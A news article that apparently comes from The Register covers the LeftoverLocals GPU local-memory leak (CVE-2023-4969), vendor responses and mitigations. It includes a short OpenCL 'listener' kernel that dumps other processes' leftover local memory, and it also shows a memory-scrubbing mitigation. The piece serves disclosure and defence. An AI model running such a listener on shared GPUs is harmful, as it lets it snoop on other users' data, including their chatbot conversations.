Future Tech

Apple, AMD, Qualcomm GPU security hole lets miscreants snoop on AI training and chats

Publish date: Thu, 18 Jan 2024, 08:52 AM

A design flaw in GPU drivers made by Apple, Qualcomm, AMD, and likely Imagination can be exploited by miscreants on a shared system to snoop on fellow users.

That means creeps can, for instance, observe the large language models and other machine-learning software being accelerated by the processors for other users. That will be a worry for those training or running LLMs on a shared server in the cloud. On a non-shared system, malware that manages to run on the box could abuse the weakness to spy on the lone user's GPU activities.

Crucially, the graphics chips and their drivers are supposed to prevent this kind of monitoring by fully isolating the memory and other resources used by each user's processes from one another. In reality, many do not implement that isolation securely, allowing data to be stolen.

The vulnerability, tracked as CVE-2023-4969 and dubbed LeftoverLocals, was discovered by Tyler Sorensen, a security research engineer on the Trail of Bits AI and ML assurance team and an assistant professor at the University of California, Santa Cruz.

Research made public on Tuesday detailed how miscreants can exploit the hole to read data they're not supposed to see in a system's local GPU memory. The team also published proof-of-concept code to snoop on an LLM chatbot in conversation with another user on a shared GPU-accelerated box.

To exploit the security oversight, an attacker just needs enough access to a shared GPU to run application code on it. On a vulnerable configuration, that code can, in spite of any isolation protections in place, mine the GPU's local memory for regions other programs have used as scratch space or a data cache. Exploitation thus involves inspecting those regions for values written by other users' processes, and exfiltrating that information.

Ideally, each of those regions would be wiped once a program finishes using it, thwarting any theft of data. On affected hardware and drivers, that clearing doesn't happen automatically, allowing other applications on the GPU to observe the leftover contents. Hence the name: LeftoverLocals.
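
Conceptually, the attack boils down to a "listener" GPU kernel that declares local (per-workgroup) memory, deliberately never initializes it, and copies whatever stale values it finds out to a buffer the attacker reads back on the host. The OpenCL C sketch below illustrates the idea; the kernel name, array size, and launch parameters are our own illustrative assumptions, not Trail of Bits' published proof of concept.

    // Sketch of a LeftoverLocals-style "listener" kernel (illustrative only).
    // It declares workgroup-local memory, never writes to it, and dumps the
    // stale contents into a global buffer the attacking process can read.
    __kernel void listener(__global float *dump, uint words_per_group)
    {
        __local float leftovers[4096];   // size is an assumption

        uint lid = get_local_id(0);
        uint gid = get_group_id(0);
        uint lsz = get_local_size(0);

        if (words_per_group > 4096)
            words_per_group = 4096;

        // On a vulnerable driver, 'leftovers' still holds data written by the
        // previous kernel that ran on this compute unit - for example chunks
        // of another user's LLM activations or outputs.
        for (uint i = lid; i < words_per_group; i += lsz)
            dump[gid * words_per_group + i] = leftovers[i];
    }

In the researchers' demonstration, a listener along these lines ran alongside another user's llama.cpp session and recovered enough leftover data to reconstruct the chatbot's responses.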

"This data leaking can have severe security consequences, especially given the rise of ML systems, where local memory is used to store model inputs, outputs, and weights," according to Sorensen and Heidy Khlaaf, Trail of Bits' engineering director for AI and ML assurance.

While the flaw potentially affects all GPU applications on vulnerable chips, it is especially concerning for machine-learning workloads because of the sheer amount of data these models push through the GPU, and therefore the amount of potentially sensitive information that could be swiped by exploiting this issue.

"LeftoverLocals can leak ~5.5 MB per GPU invocation on an AMD Radeon RX 7900 XT which, when running a 7B model on llama.cpp, adds up to ~181 MB for each LLM query," Sorensen and Khlaaf explained. "This is enough information to reconstruct the LLM response with high precision."

The bug hunters have been working with the affected GPU vendors and the CERT Coordination Center to address and disclose the flaws since September 2023.

AMD, in a security bulletin issued Tuesday, said it plans to begin rolling out mitigations in March through upcoming driver updates. The chip house also confirmed that a lot of its products are vulnerable to the memory leak, including multiple versions of its Athlon and Ryzen desktop and mobile processors, Radeon graphics cards, and Radeon and Instinct data center GPUs.
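
Until driver-level fixes land, the general software-level defence discussed for this class of bug is for GPU code (or the stack beneath it) to scrub local memory before a kernel exits, so nothing usable is left behind for the next program scheduled onto the compute unit. The OpenCL C sketch below illustrates that pattern; it is our illustration of the idea, not AMD's or any other vendor's actual fix.

    // Illustrative mitigation pattern: the kernel zeroes its own local memory
    // before returning, so a later "listener" kernel finds nothing useful.
    __kernel void my_kernel(__global float *out)
    {
        __local float scratch[1024];

        uint lid = get_local_id(0);
        uint lsz = get_local_size(0);

        /* ... the kernel's real work, using 'scratch' and writing 'out' ... */

        barrier(CLK_LOCAL_MEM_FENCE);           // wait for every work-item
        for (uint i = lid; i < 1024; i += lsz)  // then wipe the local buffer
            scratch[i] = 0.0f;
        barrier(CLK_LOCAL_MEM_FENCE);
    }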

When asked about LeftoverLocals, an AMD spokesperson directed The Register to the bulletin for its mitigation plans and provided a statement.

Google pointed out to Trail of Bits that some Imagination GPUs are impacted, and that the processor designer released a fix for its holes last month.

A Google spokesperson also provided The Register with a statement.

Apple, meanwhile, told The Register its M3 and A17 series processors have fixes for the vulnerability, and declined to comment on the boffins' assessment that "the issue still appears to be present on the Apple MacBook Air (M2)."

"Furthermore, the recently released Apple iPhone 15 does not appear to be impacted as previous versions have been," the Trail of Bits team added.

A spokesperson for Apple also told us that the iGiant appreciated the researchers' work as it advances the mega-corp's understanding of these types of threats.

Qualcomm has issued a firmware patch, though according to the researchers it only fixes the issue for some devices. The chip goliath did not respond to The Register's inquiries.

Nvidia and Arm are not said to be affected. That's the good news here: loads of AI accelerators in the cloud come from Nvidia, so if you're training or running on those, you'll be OK. The others - Apple, Imagination, and Qualcomm in particular - aren't known for their presence in public cloud GPU pools, so the risk there is limited. ®

 

https://www.theregister.com//2024/01/17/leftoverlocals_gpu_flaw/
